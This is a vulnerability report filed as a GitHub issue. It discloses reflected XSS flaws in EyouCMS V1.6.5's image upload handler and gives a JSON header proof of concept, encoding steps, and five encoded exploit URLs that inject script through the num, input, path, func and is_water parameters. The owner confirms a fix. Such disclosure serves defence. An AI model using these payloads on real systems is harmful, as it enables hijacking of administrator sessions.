
EyouCMS-V1.6.5 has multiple reflective XSS vulnerabilities #57

Closed
Hebing123 opened this issue Jan 5, 2024 · 1 comment

Comments


Hebing123 commented Jan 5, 2024

Summary

In EyouCMS-V1.6.5, when uploading images locally, the program uses the info parameter to set the parameters carried by the upload form.
Multiple reflective XSS vulnerabilities can be created by modifying the JWT-encrypted HEADER of the accepted JSON data and setting the parameters it contains to a malicious value.
These parameters are: num, input, path, func, is_water
There is no update on GitHub; the latest installation package (V1.6.5) is:
https://qiniu.eyoucms.com/source/EyouCMS-V1.6.5-UTF8-SP1_1221.zip

Details

Exploiting this XSS vulnerability mainly involves constructing the form to carry the parameters; the header is referenced directly by an <input> in the page.
In the info parameter, a "-" should be replaced with a "+" after JWT encryption. The guess is that the developer may have implemented the URL encoding and decoding logic incorrectly, resulting in accepting only "+" and not "-". This may be because they only considered standard URL encoding rules and ignored URL-safe encoding rules.

POC

HEADER: ALGORITHM & TOKEN TYPE:

{
  "num": "1",
  "size": "2097152",
  "input": "",
  "func": "head_pic_call_back",
  "path": "allimg",
  "is_water": "1'\"()&%<zzz><ScRiPt >alert(9240)</ScRiPt>",
  "alg": "HS256"
}

Note: you do not need to carry data when encrypting; just encrypt the corresponding parameter of the header, replace "-" with "+", and then perform URL encoding. Don't go in the wrong order, or you'll convert the + to a space.

In Header, when the num parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0NCk8L1NjUmlQdD4iLCJzaXplIjoiMjA5NzE1MiIsImlucHV0IjoiIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=


In Header, when the input parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IlwiPjxTY1JpUHQgPmFsZXJ0KDk3NDUpPC9TY1JpUHQ%2BIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

In Header, when the path parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0Nyk8L1NjUmlQdD4iLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

In Header, when the func parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2tcIj48U2NSaVB0ID5hbGVydCg5NzQ2KTwvU2NSaVB0PiIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

In Header, when the is_water parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nIiwiaXNfd2F0ZXIiOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0OCk8L1NjUmlQdD4iLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

Impact

An administrator who is already logged in can have their cookie stolen after accessing the malicious URL.

weng-xianhu (Owner) commented:

Thank you for your feedback. It has been fixed, and strict data processing has been carried out.
